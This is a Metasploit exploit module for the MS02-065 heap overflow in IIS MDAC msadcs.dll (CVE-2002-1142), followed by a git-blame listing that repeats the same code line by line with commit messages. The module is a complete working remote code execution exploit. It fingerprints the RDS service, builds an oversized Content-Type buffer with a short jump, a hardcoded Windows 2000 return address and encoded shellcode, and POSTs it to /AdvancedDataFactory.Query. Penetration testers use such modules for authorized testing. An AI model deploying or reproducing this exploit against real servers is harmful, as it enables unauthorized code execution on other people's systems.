metasploit-framework/modules/exploits/windows/iis/ms02_065_msadc.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name'        => 'MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow',
      'Description' => %q{
          This module can be used to execute arbitrary code on IIS servers
          that expose the /msadc/msadcs.dll Microsoft Data Access Components
          (MDAC) Remote Data Service (RDS) DataFactory service. The service is
          exploitable even when RDS is configured to deny remote connections
          (handsafe.reg). The service is vulnerable to a heap overflow where
          the RDS DataStub 'Content-Type' string is overly long. Microsoft Data
          Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.
      },
      'Author'      => 'patrick',
      'Platform'    => 'win',
      'References'  =>
        [
          ['OSVDB', '14502'],
          ['BID', '6214'],
          ['CVE', '2002-1142'],
          ['MSB', 'MS02-065'],
          ['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00\x09\x0a\x0b\x0d\x20:?<>=$\\/\"';=+%#&",
          'StackAdjustment' => -3500,
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh', # stops IIS from crashing... hopefully
        },
      'Targets'     =>
        [
          # patrickw tested OK 20120607 w2kpro en sp0 msadcs.dll v2.50.4403.0
          [ 'Windows 2000 Pro English SP0', { 'Ret' => 0x75023783 } ], # jmp eax ws2help.dll
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 20 2002'
    )

    register_options(
      [
        OptString.new('PATH', [ true,  "The path to msadcs.dll", '/msadc/msadcs.dll']),
      ], self.class)
  end

  def check
    res = send_request_raw({
        'uri'          =>  normalize_uri(datastore['PATH']),
        'method'       => 'GET',
      })
    if (res and res.code == 200)
      print_status("Server responded with HTTP #{res.code} OK")
      if (res.body =~ /Content-Type: application\/x-varg/)
        print_good("#{datastore['PATH']} matches fingerprint application\/x-varg")
        Exploit::CheckCode::Detected
      end
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    sploit = rand_text_alphanumeric(136)
    sploit[24,2] = Rex::Arch::X86.jmp_short(117)
    sploit << [target['Ret']].pack('V')
    sploit << payload.encoded

    data  = 'Content-Type: ' + sploit

    res = send_request_raw({
      'uri'          => normalize_uri(datastore['PATH'], '/AdvancedDataFactory.Query'),
      'headers' =>
        {
          'Content-Length' => data.length,
        },

      'method'       => 'POST',
      'data'         => data,
    })

    handler
  end

end
Added ms02_065_msadc exploit module. 2012-06-07 11:02:13 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Added ms02_065_msadc exploit module. 2012-06-07 11:02:13 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = NormalRanking`
Added ms02_065_msadc exploit module. 2012-06-07 11:02:13 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::HttpClient`
Added ms02_065_msadc exploit module. 2012-06-07 11:02:13 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize`
			`super(`
Microsoft module name changes So after making changes for MSIE modules (see #3161), I decided to take a look at all MS modules, and then I ended up changing all of them. Reason is the same: if you list modules in an ordered list , this is a little bit easier to see for your eyes. 2014-03-29 01:56:53 +00:00			`'Name' => 'MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow',`
Retab modules 2013-08-30 21:28:54 +00:00			`'Description' => %q{`
			`This module can be used to execute arbitrary code on IIS servers`
			`that expose the /msadc/msadcs.dll Microsoft Data Access Components`
			`(MDAC) Remote Data Service (RDS) DataFactory service. The service is`
			`exploitable even when RDS is configured to deny remote connections`
			`(handsafe.reg). The service is vulnerable to a heap overflow where`
			`the RDS DataStub 'Content-Type' string is overly long. Microsoft Data`
			`Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.`
			`},`
			`'Author' => 'patrick',`
			`'Platform' => 'win',`
			`'References' =>`
			`[`
			`['OSVDB', '14502'],`
			`['BID', '6214'],`
			`['CVE', '2002-1142'],`
			`['MSB', 'MS02-065'],`
			`['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html']`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`
			`'BadChars' => "\x00\x09\x0a\x0b\x0d\x20:?<>=$\\/\"';=+%#&",`
			`'StackAdjustment' => -3500,`
			`},`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'seh', # stops IIS from crashing... hopefully`
			`},`
			`'Targets' =>`
			`[`
			`# patrickw tested OK 20120607 w2kpro en sp0 msadcs.dll v2.50.4403.0`
			`[ 'Windows 2000 Pro English SP0', { 'Ret' => 0x75023783 } ], # jmp eax ws2help.dll`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Nov 20 2002'`
			`)`
Added ms02_065_msadc exploit module. 2012-06-07 11:02:13 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`OptString.new('PATH', [ true, "The path to msadcs.dll", '/msadc/msadcs.dll']),`
			`], self.class)`
			`end`
Added ms02_065_msadc exploit module. 2012-06-07 11:02:13 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def check`
			`res = send_request_raw({`
			`'uri' => normalize_uri(datastore['PATH']),`
			`'method' => 'GET',`
			`})`
			`if (res and res.code == 200)`
			`print_status("Server responded with HTTP #{res.code} OK")`
			`if (res.body =~ /Content-Type: application\/x-varg/)`
			`print_good("#{datastore['PATH']} matches fingerprint application\/x-varg")`
			`Exploit::CheckCode::Detected`
			`end`
			`else`
			`Exploit::CheckCode::Safe`
			`end`
			`end`
Get rid of some whitespace 2012-06-07 17:17:25 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
			`sploit = rand_text_alphanumeric(136)`
			`sploit[24,2] = Rex::Arch::X86.jmp_short(117)`
			`sploit << [target['Ret']].pack('V')`
			`sploit << payload.encoded`
Added ms02_065_msadc exploit module. 2012-06-07 11:02:13 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`data = 'Content-Type: ' + sploit`
Get rid of some whitespace 2012-06-07 17:17:25 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`res = send_request_raw({`
			`'uri' => normalize_uri(datastore['PATH'], '/AdvancedDataFactory.Query'),`
			`'headers' =>`
			`{`
			`'Content-Length' => data.length,`
			`},`
Get rid of some whitespace 2012-06-07 17:17:25 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`'method' => 'POST',`
			`'data' => data,`
			`})`
Added ms02_065_msadc exploit module. 2012-06-07 11:02:13 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`handler`
			`end`
Added ms02_065_msadc exploit module. 2012-06-07 11:02:13 +00:00
			`end`